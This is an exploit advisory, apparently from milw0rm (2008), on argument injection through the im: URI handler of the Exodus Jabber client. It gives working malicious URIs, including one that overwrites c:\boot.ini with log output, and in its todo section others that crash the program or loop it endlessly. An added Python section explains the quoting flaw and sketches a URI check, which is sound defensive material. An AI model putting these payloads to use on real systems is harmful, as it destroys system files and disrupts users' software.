--------------------------------------------------------------------------------
Exodus v0.10 uri handler arbitrary parameter injection
by Nine:Situations:Group::strawdog
tested against IE8b/xpsp3
may not work against non-English systems because of an installation bug
--------------------------------------------------------------------------------
software site: http://code.google.com/p/exodus/
description:
Exodus is a free software instant messaging client developed by Peter
Millard and written in Borland Delphi that can connect to Jabber servers
and exchange messages with other Jabber users. Currently, binaries are
only available for Microsoft Windows. Exodus was designed as the official
successor of the Winjab client, as Winjab was a personal project that
was becoming too difficult to maintain[..]
--------------------------------------------------------------------------------

reg key:
HKEY_CLASSES_ROOT\im\shell\Open\command
C:\Program Files\Exodus\Exodus.exe -u '%1'
--------------------------------------------------------------------------------
it's possible to inject arbitrary command line parameters, ex. this shows
the argument list:
im:///'%20-?

this overwrites an arbitrary file:
im:///'%20-l%20c:\boot.ini%20-v

now boot.ini looks like this:
[2008-11-17 13.50.41.437] Trying to setup the Auto Away timer.
[2008-11-17 13.50.41.453] Using Win32 API for Autoaway checks!!
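
added example (not part of the original advisory or of the Exodus code): why the single-quoted '%1' in the reg key lets a decoded space start a new argument, and what a handler-side check looks like. it assumes the uri is percent-decoded before it replaces %1, as the %20 examples above imply; the splitter is a simplified model of Windows argument parsing, and QUOTED_TEMPLATE and uri_is_safe are hypothetical names.

```python
from urllib.parse import unquote

# Handler template from the page's reg key, and a double-quoted variant
# (the variant is an assumption for comparison, not the project's fix).
PAGE_TEMPLATE = r"C:\Program Files\Exodus\Exodus.exe -u '%1'"
QUOTED_TEMPLATE = r'"C:\Program Files\Exodus\Exodus.exe" -u "%1"'

def split_args(cmdline):
    """Simplified Windows-style split: whitespace separates arguments unless
    inside double quotes; single quotes are ordinary characters."""
    args, cur, in_dq, started = [], "", False, False
    for ch in cmdline:
        if ch == '"':
            in_dq, started = not in_dq, True
        elif ch in " \t" and not in_dq:
            if started:
                args.append(cur)
            cur, started = "", False
        else:
            cur, started = cur + ch, True
    if started:
        args.append(cur)
    return args

def switches(template, uri):
    """Arguments beginning with '-' after the decoded URI replaces %1."""
    expanded = template.replace("%1", unquote(uri))
    return [a for a in split_args(expanded) if a.startswith("-")]

def injected(template, uri):
    """Switches present beyond those the template itself supplies."""
    own = [a for a in split_args(template) if a.startswith("-")]
    return switches(template, uri)[len(own):]

def uri_is_safe(uri):
    """Handler-side check: refuse URIs that decode to whitespace or quotes."""
    return not any(c in " \t\r\n\"'" for c in unquote(uri))

if __name__ == "__main__":
    uri = "im:///'%20-?"                   # first example URI from the page
    print(injected(PAGE_TEMPLATE, uri))    # extra switch reaches the program
    print(injected(QUOTED_TEMPLATE, uri))  # URI stays one argument
    print(uri_is_safe(uri), uri_is_safe("im:///user@example.org"))
```

double quotes around %1 only hold while the decoded uri contains no double quote itself, which is why the handler should also reject such input before parsing its arguments.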
--------------------------------------------------------------------------------
todo:
investigate this as well:
im:///'%20-c%20[A*300]

this will cause an infinite loop through multiple unhandled exceptions
and this:
im:///'%20-c%20file:///aaaa%20
crashes exodus.exe
--------------------------------------------------------------------------------
our site ---------------------------------------> http://retrogod.altervista.org

# milw0rm.com [2008-11-17]